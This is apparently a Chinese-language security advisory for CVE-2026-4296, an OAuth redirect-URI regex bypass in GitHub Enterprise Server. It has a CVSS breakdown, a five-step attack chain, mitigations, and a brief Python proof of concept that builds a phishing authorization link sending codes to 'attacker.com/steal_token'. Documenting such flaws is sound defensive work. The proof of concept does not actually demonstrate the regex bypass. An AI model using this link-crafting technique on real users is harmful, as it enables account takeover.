CVE-2026-4296 CVSS 8.8 高危

CVE-2026-4296 GitHub Enterprise Server OAuth重定向绕过漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4296

漏洞类型

认证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GitHub Enterprise Server

漏洞概述

GitHub Enterprise Server存在一个不正确的正则表达式漏洞，允许攻击者绕过OAuth重定向URI验证。攻击者若知悉第一方OAuth应用的回调URL，可诱导受害者点击恶意链接，将OAuth授权码重定向至攻击者控制域名，进而获取受害者账户权限。

技术细节

该漏洞源于GitHub Enterprise Server在处理OAuth重定向URI时使用的正则表达式存在逻辑缺陷。正常情况下，服务器应严格校验回调地址是否属于注册的白名单域名。然而，由于正则表达式编写不当，攻击者可以构造特定的恶意URL，使其通过验证但实际指向攻击者控制的服务器。攻击过程不需要受害者输入凭据，仅需诱导受害者点击经过精心构造的授权链接。一旦受害者点击并完成OAuth授权流程，授权服务器会生成授权码并跳转至攻击者预设的恶意地址。攻击者截获该授权码后，即可在本地向服务器申请访问令牌，从而接管受害者的账户权限，获取该OAuth应用被授予的所有访问范围。

攻击链分析

STEP 1

侦察

攻击者识别目标GitHub Enterprise Server上存在漏洞的OAuth应用程序及其注册的回调URL模式。

STEP 2

制作恶意链接

利用正则表达式的验证缺陷，攻击者构造一个包含恶意重定向URI的授权链接，该URI能通过服务器验证但指向攻击者控制的服务器。

STEP 3

社会工程学攻击

攻击者将精心构造的恶意链接发送给目标受害者，诱导其点击。

STEP 4

执行攻击

受害者点击链接并同意授权，服务器将OAuth授权码重定向至攻击者控制的域名。

STEP 5

权限提升

攻击者截获授权码，向服务器请求访问令牌，从而获取受害者的账户权限及数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4296: OAuth Redirect URI Bypass
# This script demonstrates the conceptual generation of a malicious link.

import urllib.parse

def generate_malicious_link(target_host, client_id, malicious_domain):
    # Base endpoint for authorization
    auth_endpoint = f"{target_host}/login/oauth/authorize"
    
    # The vulnerability allows bypassing the regex check for redirect_uri.
    # An attacker crafts a URI that looks valid to the regex but points to them.
    # Example: Exploiting regex anchoring issues or character class misinterpretation.
    bypass_redirect_uri = f"{malicious_domain}/steal_token"
    
    params = {
        "client_id": client_id,
        "redirect_uri": bypass_redirect_uri,
        "scope": "read:user,repo",
        "state": "random_security_token"
    }
    
    return f"{auth_endpoint}?{urllib.parse.urlencode(params)}"

# Usage Example
# target = "https://github.enterprise.local"
# client = "d81c8b3c9e1f2a3b"
# evil = "https://attacker.com"
# print(generate_malicious_link(target, client, evil))

影响范围

GitHub Enterprise Server < 3.21

防御指南

临时缓解措施

建议管理员立即检查系统日志，查找是否存在异常的OAuth重定向请求。在无法立即升级的情况下，应暂时禁用非必要的第三方OAuth集成，并提醒用户警惕不明来源的授权链接。同时，可以通过网络边界设备监控并阻断指向已知恶意域名的出站连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表